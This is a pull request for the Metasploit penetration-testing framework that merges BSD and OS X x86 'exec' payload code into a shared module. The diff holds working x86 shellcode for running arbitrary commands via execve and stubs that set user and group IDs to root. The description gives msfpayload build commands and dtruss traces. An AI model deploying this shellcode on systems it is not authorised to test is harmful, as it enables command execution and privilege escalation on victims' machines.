### PR TITLE
Replace bsd x86 exec payload and DRY up osx/bsd code

### DIFF
--- a/lib/msf/core/payload/bsd.rb
+++ b/lib/msf/core/payload/bsd.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/payload/bsd/x86'
 
 ###
 #

--- a/lib/msf/core/payload/bsd.rb
+++ b/lib/msf/core/payload/bsd.rb
@@ -10,6 +10,8 @@ require 'msf/core'
 ###
 module Msf::Payload::Bsd
 
+  include Msf::Payload::Bsd::X86
+
   #
   # This mixin is chained within payloads that target the BSD platform.
   # It provides special prepends, to support things like chroot and setuid.
@@ -73,7 +75,6 @@ module Msf::Payload::Bsd
     ret
   end
 
-
   def apply_prepends(buf)
     test_arch = [ *(self.arch) ]
     pre = ''
@@ -86,76 +87,6 @@ module Msf::Payload::Bsd
     end
 
     pre + buf + app
-  end
-
-  def handle_x86_bsd_opts(pre, app)
-    if (datastore['PrependSetresuid'])
-      # setresuid(0, 0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x66\xb8\x37\x01"     +#   movw    $0x0137,%ax                #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
-
-    if (datastore['PrependSetreuid'])
-      # setreuid(0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x7e"             +#   movb    $0x7e,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
-
-    if (datastore['PrependSetuid'])
-      # setuid(0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x17"             +#   movb    $0x17,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
-
-    if (datastore['PrependSetresgid'])
-      # setresgid(0, 0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x66\xb8\x38\x01"     +#   movw    $0x0138,%ax                #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
-
-    if (datastore['PrependSetregid'])
-      # setregid(0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x7f"             +#   movb    $0x7f,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
-
-    if (datastore['PrependSetgid'])
-      # setgid(0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\xb5"             +#   movb    $0xb5,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
-
-    if (datastore['AppendExit'])
-      # exit(0)
-      app << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x01"             +#   movb    $0x01,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
   end
 
   def handle_x64_bsd_opts(pre, app)

--- a/lib/msf/core/payload/bsd/x86.rb
+++ b/lib/msf/core/payload/bsd/x86.rb
@@ -4,9 +4,10 @@ require 'msf/core'
 ###
 # Contains common x86 BSD code
 ###
-module Msf::Payload::Bsd::X86
+module Msf::Payload::Bsd
+module X86
 
-  def exec_payload
+  def bsd_x86_exec_payload
     cmd_str   = datastore['CMD'] || ''
     # Split the cmd string into arg chunks
     cmd_parts = Shellwords.shellsplit(cmd_str)
@@ -125,4 +126,5 @@ module Msf::Payload::Bsd::X86
     end
   end
 
+end
 end

--- a/lib/msf/core/payload/bsd/x86.rb
+++ b/lib/msf/core/payload/bsd/x86.rb
@@ -1,0 +1,128 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+###
+# Contains common x86 BSD code
+###
+module Msf::Payload::Bsd::X86
+
+  def exec_payload
+    cmd_str   = datastore['CMD'] || ''
+    # Split the cmd string into arg chunks
+    cmd_parts = Shellwords.shellsplit(cmd_str)
+    # the non-exe-path parts of the chunks need to be reversed for execve
+    cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
+    arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
+
+    payload = ''
+
+    # Stuff an array of arg strings into memory
+    payload << "\x31\xc0"                          # xor eax, eax  (eax => 0)
+    payload << Rex::Arch::X86.call(arg_str.length) # jmp over CMD_STR, stores &CMD_STR on stack
+    payload << arg_str
+    payload << "\x5B"                              # pop ebx (ebx => &CMD_STR)
+
+    # now EBX contains &cmd_parts[0], the exe path
+    if cmd_parts.length > 1
+      # Build an array of pointers to arguments
+      payload << "\x89\xD9"                     # mov ecx, ebx
+      payload << "\x50"                         # push eax; null byte (end of array)
+      payload << "\x89\xe2"                     # mov edx, esp (EDX points to the end-of-array null byte)
+
+      cmd_parts[1..-1].each_with_index do |arg, idx|
+        l = [cmd_parts[idx].length+1].pack('V')
+        # can probably save space here by doing the loop in ASM
+        # for each arg, push its current memory location on to the stack
+        payload << "\x81\xC1"                 # add ecx, ...
+        payload << l                          # (cmd_parts[idx] is the prev arg)
+        payload << "\x51"                     # push ecx (&cmd_parts[idx])
+      end
+
+      payload << "\x53"                         # push ebx (&cmd_parts[0])
+      payload << "\x89\xe1"                     # mov ecx, esp (ptr to ptr to first str)
+      payload << "\x52"                         # push edx
+      payload << "\x51"                         # push ecx
+    else
+      # pass NULL args array to execve() call
+      payload << "\x50\x50"                     # push eax, push eax
+    end
+
+    payload << "\x53"                             # push ebx
+    payload << "\xb0\x3b"                         # mov al, 0x3b (execve)
+    payload << "\x50"                             # push eax
+    payload << "\xcd\x80"                         # int 0x80 (triggers execve syscall)
+
+    payload
+  end
+
+  def handle_x86_bsd_opts(pre, app)
+    if (datastore['PrependSetresuid'])
+      # setresuid(0, 0, 0)
+      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x66\xb8\x37\x01"     +#   movw    $0x0137,%ax                #
+             "\xcd\x80"              #   int     $0x80                      #
+    end
+
+    if (datastore['PrependSetreuid'])
+      # setreuid(0, 0)
+      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\xb0\x7e"             +#   movb    $0x7e,%al                  #
+             "\xcd\x80"              #   int     $0x80                      #
+    end
+
+    if (datastore['PrependSetuid'])
+      # setuid(0)
+      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\xb0\x17"             +#   movb    $0x17,%al                  #
+             "\xcd\x80"              #   int     $0x80                      #
+    end
+
+    if (datastore['PrependSetresgid'])
+      # setresgid(0, 0, 0)
+      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x66\xb8\x38\x01"     +#   movw    $0x0138,%ax                #
+             "\xcd\x80"              #   int     $0x80                      #
+    end
+
+    if (datastore['PrependSetregid'])
+      # setregid(0, 0)
+      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\xb0\x7f"             +#   movb    $0x7f,%al                  #
+             "\xcd\x80"              #   int     $0x80                      #
+    end
+
+    if (datastore['PrependSetgid'])
+      # setgid(0)
+      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+             "\x50"                 +#   pushl   %eax                       #
+             "\x50"                 +#   pushl   %eax                       #
+             "\xb0\xb5"             +#   movb    $0xb5,%al                  #
+             "\xcd\x80"              #   int     $0x80                      #
+    end
+
+    if (datastore['AppendExit'])
+      # exit(0)
+      app << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+             "\x50"                 +#   pushl   %eax                       #
+             "\xb0\x01"             +#   movb    $0x01,%al                  #
+             "\xcd\x80"              #   int     $0x80                      #
+    end
+  end
+
+end

--- a/lib/msf/core/payload/osx.rb
+++ b/lib/msf/core/payload/osx.rb
@@ -19,13 +19,6 @@ module Msf::Payload::Osx
 
     register_advanced_options(
       [
-        Msf::OptBool.new('PrependSetresuid',
-          [
-            false,
-            "Prepend a stub that executes the setresuid(0, 0, 0) system call",
-            false
-          ]
-        ),
         Msf::OptBool.new('PrependSetreuid',
           [
             false,
@@ -37,13 +30,6 @@ module Msf::Payload::Osx
           [
             false,
             "Prepend a stub that executes the setuid(0) system call",
-            false
-          ]
-        ),
-        Msf::OptBool.new('PrependSetresgid',
-          [
-            false,
-            "Prepend a stub that executes the setresgid(0, 0, 0) system call",
             false
           ]
         ),
@@ -89,16 +75,6 @@ module Msf::Payload::Osx
   end
 
   def handle_x86_osx_opts(pre, app)
-    if (datastore['PrependSetresuid'])
-      # setresuid(0, 0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x66\xb8\x37\x01"     +#   movw    $0x0137,%ax                #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
 
     if (datastore['PrependSetreuid'])
       # setreuid(0, 0)
@@ -116,17 +92,6 @@ module Msf::Payload::Osx
              "\x50"                 +#   pushl   %eax                       #
              "\x50"                 +#   pushl   %eax                       #
              "\xb0\x17"             +#   movb    $0x17,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
-    end
-
-    if (datastore['PrependSetresgid'])
-      # setresgid(0, 0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x66\xb8\x38\x01"     +#   movw    $0x0138,%ax                #
              "\xcd\x80"              #   int     $0x80                      #
     end
 
@@ -159,10 +124,6 @@ module Msf::Payload::Osx
   end
 
   def handle_x64_osx_opts(pre, app)
-    if (datastore['PrependSetresuid'])
-      # setresuid(0, 0, 0)
-      raise RuntimeError, "setresuid syscall is not implemented on x64 OSX systems"
-    end
 
     if (datastore['PrependSetreuid'])
       # setreuid(0, 0)
@@ -183,11 +144,6 @@ module Msf::Payload::Osx
              "\x4c\x89\xc0"         +# mov rax, r8
              "\x48\x31\xff"         +# xor rdi, rdi  0
              "\x0f\x05"             # syscall
-    end
-
-    if (datastore['PrependSetresgid'])
-      # setresgid(0, 0, 0)
-      raise RuntimeError, "setresgid syscall is not implemented on x64 OSX systems"
     end
 
     if (datastore['PrependSetregid'])

--- a/modules/payloads/singles/bsd/x86/exec.rb
+++ b/modules/payloads/singles/bsd/x86/exec.rb
@@ -30,10 +30,11 @@ module Metasploit3
         'snagg <snagg[at]openssl.it>',
         'argp <argp[at]census-labs.com>',
         'joev'
-      ]
+      ],
       'License'     => BSD_LICENSE,
       'Platform'    => 'bsd',
-      'Arch'        => ARCH_X86))
+      'Arch'        => ARCH_X86
+    ))
 
     # Register exec options
     register_options([

--- a/modules/payloads/singles/bsd/x86/exec.rb
+++ b/modules/payloads/singles/bsd/x86/exec.rb
@@ -24,12 +24,16 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'BSD Execute Command',
-      'Description'   => 'Execute an arbitrary command',
-      'Author'        => 'vlad902',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'bsd',
-      'Arch'          => ARCH_X86))
+      'Name'        => 'BSD Execute Command',
+      'Description' => 'Execute an arbitrary command',
+      'Author'      => [
+        'snagg <snagg[at]openssl.it>',
+        'argp <argp[at]census-labs.com>',
+        'joev'
+      ]
+      'License'     => BSD_LICENSE,
+      'Platform'    => 'bsd',
+      'Arch'        => ARCH_X86))
 
     # Register exec options
     register_options([

--- a/modules/payloads/singles/bsd/x86/exec.rb
+++ b/modules/payloads/singles/bsd/x86/exec.rb
@@ -5,7 +5,6 @@
 
 
 require 'msf/core'
-require 'msf/core/payload/bsd/x86'
 
 
 ###
@@ -21,7 +20,7 @@ module Metasploit3
   CachedSize = 16
 
   include Msf::Payload::Single
-  include Msf::Payload::Bsd::X86
+  include Msf::Payload::Bsd
 
   def initialize(info = {})
     super(merge_info(info,

--- a/modules/payloads/singles/bsd/x86/exec.rb
+++ b/modules/payloads/singles/bsd/x86/exec.rb
@@ -5,6 +5,7 @@
 
 
 require 'msf/core'
+require 'msf/core/payload/bsd/x86'
 
 
 ###
@@ -17,10 +18,10 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 42
+  CachedSize = 16
 
   include Msf::Payload::Single
-  include Msf::Payload::Bsd
+  include Msf::Payload::Bsd::X86
 
   def initialize(info = {})
     super(merge_info(info,
@@ -32,64 +33,16 @@ module Metasploit3
       'Arch'          => ARCH_X86))
 
     # Register exec options
-    register_options(
-      [
-        OptString.new('CMD',  [ true,  "The command string to execute" ]),
-      ], self.class)
+    register_options([
+      OptString.new('CMD',  [ true,  "The command string to execute" ]),
+    ], self.class)
   end
 
   #
   # Dynamically builds the exec payload based on the user's options.
   #
   def generate_stage
-    cmd = datastore['CMD'] || ''
-    asm = <<-EOS
-;;
-;
-;        Name: single_exec
-;   Platforms: *BSD
-;      Author: vlad902 <vlad902 [at] gmail.com>
-;     License:
-;
-;        This file is part of the Metasploit Exploit Framework
-;        and is subject to the same licenses and copyrights as
-;        the rest of this package.
-;
-; Description:
-;
-;        Execute an arbitary command.
-;
-;;
-; NULLs are fair game.
-
-  push	0x3b
-  pop	eax
-  cdq
-
-  push	edx
-  push	0x632d
-  mov	edi, esp
-
-  push	edx
-  push	0x68732f6e
-  push	0x69622f2f
-  mov	ebx, esp
-
-  push	edx
-  call	getstr
-db "CMD", 0x00
-getstr:
-  push	edi
-  push	ebx
-  mov	ecx, esp
-  push	edx
-  push	ecx
-  push	ebx
-  push	eax
-  int	0x80
-EOS
-    asm.gsub!(/CMD/, cmd.gsub('"', "\\\""))
-    payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
+    bsd_x86_exec_payload
   end
 
 end

--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -5,7 +5,6 @@
 
 
 require 'msf/core'
-require 'msf/core/payload/bsd/x86'
 
 ###
 #

--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -5,7 +5,7 @@
 
 
 require 'msf/core'
-
+require 'msf/core/payload/bsd/x86'
 
 ###
 #
@@ -20,79 +20,32 @@ module Metasploit3
   CachedSize = 16
 
   include Msf::Payload::Single
+  include Msf::Payload::Bsd::X86
   include Msf::Payload::Osx
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'OS X Execute Command',
-      'Description'   => 'Execute an arbitrary command',
-      'Author'        =>
-        [
-          'snagg <snagg[at]openssl.it>',
-          'argp <argp[at]census-labs.com>',
-          'joev'
-        ],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'osx',
-      'Arch'          => ARCH_X86
+      'Name'        => 'OS X Execute Command',
+      'Description' => 'Execute an arbitrary command',
+      'Author'      => [
+        'snagg <snagg[at]openssl.it>',
+        'argp <argp[at]census-labs.com>',
+        'joev'
+      ],
+      'License'     => BSD_LICENSE,
+      'Platform'    => 'osx',
+      'Arch'        => ARCH_X86
     ))
 
-    register_options(
-      [
-        OptString.new('CMD',  [ true,  "The command string to execute" ]),
-      ], self.class
-    )
+    register_options([
+      OptString.new('CMD',  [ true,  "The command string to execute" ]),
+    ], self.class)
   end
 
   #
   # Dynamically builds the exec payload based on the user's options.
   #
   def generate_stage
-    cmd_str   = datastore['CMD'] || ''
-    # Split the cmd string into arg chunks
-    cmd_parts = Shellwords.shellsplit(cmd_str)
-    # the non-exe-path parts of the chunks need to be reversed for execve
-    cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
-    arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
-
-    payload = ''
-
-    # Stuff an array of arg strings into memory
-    payload << "\x31\xc0"                          # xor eax, eax  (eax => 0)
-    payload << Rex::Arch::X86.call(arg_str.length) # jmp over CMD_STR, stores &CMD_STR on stack
-    payload << arg_str
-    payload << "\x5B"                              # pop ebx (ebx => &CMD_STR)
-
-    # now EBX contains &cmd_parts[0], the exe path
-    if cmd_parts.length > 1
-      # Build an array of pointers to arguments
-      payload << "\x89\xD9"                     # mov ecx, ebx
-      payload << "\x50"                         # push eax; null byte (end of array)
-      payload << "\x89\xe2"                     # mov edx, esp (EDX points to the end-of-array null byte)
-
-      cmd_parts[1..-1].each_with_index do |arg, idx|
-        l = [cmd_parts[idx].length+1].pack('V')
-        # can probably save space here by doing the loop in ASM
-        # for each arg, push its current memory location on to the stack
-        payload << "\x81\xC1"                 # add ecx, ...
-        payload << l                          # (cmd_parts[idx] is the prev arg)
-        payload << "\x51"                     # push ecx (&cmd_parts[idx])
-      end
-
-      payload << "\x53"                         # push ebx (&cmd_parts[0])
-      payload << "\x89\xe1"                     # mov ecx, esp (ptr to ptr to first str)
-      payload << "\x52"                         # push edx
-      payload << "\x51"                         # push ecx
-    else
-      # pass NULL args array to execve() call
-      payload << "\x50\x50"                     # push eax, push eax
-    end
-
-    payload << "\x53"                             # push ebx
-    payload << "\xb0\x3b"                         # mov al, 0x3b (execve)
-    payload << "\x50"                             # push eax
-    payload << "\xcd\x80"                         # int 0x80 (triggers execve syscall)
-
-    payload
+    bsd_x86_exec_payload
   end
 end


### PR DESCRIPTION
This should close out #5124. This replaces the x86 bsd exec payload with osx's, which is a bit shorter, and allows any binary + set of args to be passed straight to execve. I've also merged all duplicate shellcode between BSD and OSX on x86 into a BSD mixin, `Msf::Payload::Bsd::X86`.

Additionally, this removes two prepends stubs, `setresgid` and `setresuid` from the OSX payload mixin's datastore options. These syscalls have never been present on OSX.
#### Verification
- [x] Generate a BSD x86 exec payload with prepend flags set, ensure it works as expected
  
  ```
  $ ./msfpayload bsd/x86/exec CMD='/bin/echo 1 2 3' PrependSetreuid=1 PrependSetuid=1 PrependSetregid=1 PrependSetgid=1 PrependSetresuid=1 Prependsetresgid=1 AppendExit=1 LHOST=192.168.0.4 LPORT=5555 X > /tmp/bsd.bin
  $ chmod +x /tmp/bsd.bin
  $ /tmp/bsd.bin
  1 2 3
  $ sudo su
  # kldload dtrace 
  # kldload dtraceall
  # dtruss /tmp/bsd.bin
  ..
  setresuid(0x0, 0x0, 0x0)         = 0 0
  setreuid(0x0, 0x0, 0x0)      = 0 0
  setuid(0x0, 0x0, 0x0)        = 0 0
  setresgid(0x0, 0x0, 0x0)         = 0 0
  setregid(0x0, 0x0, 0x0)      = 0 0
  setgid(0x0, 0x0, 0x0)        = 0 0
  execve(0x4000ED, 0x7FFFFFFFE990, 0x0)        = 0 0
  ```
- [x] Now do the same for the osx x86 payload:
  
  ```
  ./msfpayload osx/x86/exec CMD='/bin/echo 1 2 3' PrependSetreuid=1 PrependSetuid=1 PrependSetregid=1 PrependSetgid=1 AppendExit=1 LHOST=192.168.0.4 LPORT=5555 X > /tmp/osx.bin
  $ chmod +x /tmp/osx.bin
  $ /tmp/osx.bin
  1 2 3
  $ sudo dtruss /tmp/osx.bin
  ..
  setreuid(0x0, 0x0, 0xBFFFDE94)           = 0 0
  setuid(0x0, 0x0, 0xBFFFDE94)             = 0 0
  psynch_cvclrprepost(0x0, 0x0, 0x0)               = 0 0
  setregid(0x0, 0x0, 0x0)          = 0 0
  setgid(0x0, 0x0, 0x0)            = 0 0
  ..
  ```
